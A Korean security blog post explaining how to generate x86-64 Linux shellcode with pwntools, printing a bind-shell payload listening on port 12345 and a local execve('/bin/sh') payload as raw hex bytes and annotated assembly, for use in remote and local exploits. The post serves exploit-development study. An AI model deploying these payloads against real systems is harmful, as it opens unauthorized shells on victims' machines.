#dokydoky
[Shellcode] pwntools을 이용한 shellcode 만들기 본문
context에서 architecture, os를 지정한 후 아래와 같이 쉘코드를 생성할 수 있다.
shellcraft.bindsh은 standalone 데몬을 remote exploit하기 위한 쉘코드.
shellcraft.sh은 local exploit이나 xinetd로 관리되는 바이너리를 exploit하기 위한 쉘코드
(stanalone, xinetd가 이해되지 않는다면 참고 : http://dokydoky.tistory.com/446)
In [57]: from pwn import *
In [58]: context(arch='amd64', os='linux')
In [59]: print "".join(['\\x{:02X}'.format(ord(i)) for i in asm(shellcraft.bindsh(12345, network='ipv4'))])
\x6A\x29\x58\x6A\x02\x5F\x6A\x01\x5E\x99\x0F\x05\x52\xBA\x01\x01\x01\x01\x81\xF2\x03\x01\x31\x38\x52\x6A\x10\x5A\x48\x89\xC5\x48\x89\xC7\x6A\x31\x58\x48\x89\xE6\x0F\x05\x6A\x32\x58\x48\x89\xEF\x6A\x01\x5E\x0F\x05\x6A\x2B\x58\x48\x89\xEF\x31\xF6\x99\x0F\x05\x48\x89\xC5\x6A\x03\x5E\x48\xFF\xCE\x78\x0B\x56\x6A\x21\x58\x48\x89\xEF\x0F\x05\xEB\xEF\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05
In [60]: print "".join(['\\x{:02X}'.format(ord(i)) for i in asm(shellcraft.sh())])
\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05
어셈블리 코드는 아래와 같다.
In [62]: print shellcraft.bindsh(12345, network='ipv4')
/* call socket('AF_INET', 'SOCK_STREAM', 0) */
push (SYS_socket) /* 0x29 */
pop rax
push (AF_INET) /* 2 */
pop rdi
push (SOCK_STREAM) /* 1 */
pop rsi
cdq /* rdx=0 */
syscall
/* Build sockaddr_in structure */
push rdx
mov edx, 0x1010101 /* (AF_INET | (14640 << 16)) == 0x39300002 */
xor edx, 0x38310103
push rdx
/* rdx = sizeof(struct sockaddr_in6) */
push 0x10
pop rdx
/* Save server socket in rbp */
mov rbp, rax
/* call bind('rax', 'rsp', 'rdx') */
mov rdi, rax
push (SYS_bind) /* 0x31 */
pop rax
mov rsi, rsp
syscall
/* call listen('rbp', 1) */
push (SYS_listen) /* 0x32 */
pop rax
mov rdi, rbp
push 1
pop rsi
syscall
/* call accept('rbp', 0, 0) */
push (SYS_accept) /* 0x2b */
pop rax
mov rdi, rbp
xor esi, esi /* 0 */
cdq /* rdx=0 */
syscall
dup_106:
mov rbp, rax
push 3
loop_107:
pop rsi
dec rsi
js after_108
push rsi
/* call dup2('rbp', 'rsi') */
push (SYS_dup2) /* 0x21 */
pop rax
mov rdi, rbp
syscall
jmp loop_107
after_108:
/* push argument array ['sh\x00'] */
/* push 'sh\x00' */
push 0x1010101 ^ 0x6873
xor dword ptr [rsp], 0x1010101
xor edx, edx /* 0 */
push rdx /* null terminate */
push 8
pop rdx
add rdx, rsp
push rdx /* 'sh\x00' */
mov rdx, rsp
/* push '/bin///sh\x00' */
push 0x68
mov rax, 0x732f2f2f6e69622f
push rax
/* call execve('rsp', 'rdx', 0) */
push (SYS_execve) /* 0x3b */
pop rax
mov rdi, rsp
mov rsi, rdx
cdq /* rdx=0 */
syscall
In [63]: print shellcraft.sh()
/* push argument array ['sh\x00'] */
/* push 'sh\x00' */
push 0x1010101 ^ 0x6873
xor dword ptr [rsp], 0x1010101
xor edx, edx /* 0 */
push rdx /* null terminate */
push 8
pop rdx
add rdx, rsp
push rdx /* 'sh\x00' */
mov rdx, rsp
/* push '/bin///sh\x00' */
push 0x68
mov rax, 0x732f2f2f6e69622f
push rax
/* call execve('rsp', 'rdx', 0) */
push (SYS_execve) /* 0x3b */
pop rax
mov rdi, rsp
mov rsi, rdx
cdq /* rdx=0 */
syscall
'System Hacking' 카테고리의 다른 글
| [CVE-2013-2028] Nginx stack-based buffer overflow(3) - NX, ASLR (0) | 2016.12.26 |
|---|---|
| [CVE-2013-2028] Nginx stack-based buffer overflow(2) - NX (0) | 2016.12.25 |
| [CVE-2013-2028] Nginx stack-based buffer overflow(1) - source code (0) | 2016.12.25 |
| [Remote exploit] Remote shell을 얻는 방법.(Xinetd, standalone) (0) | 2016.12.20 |
| Stack Buffer OverFlow (1) | 2011.08.24 |
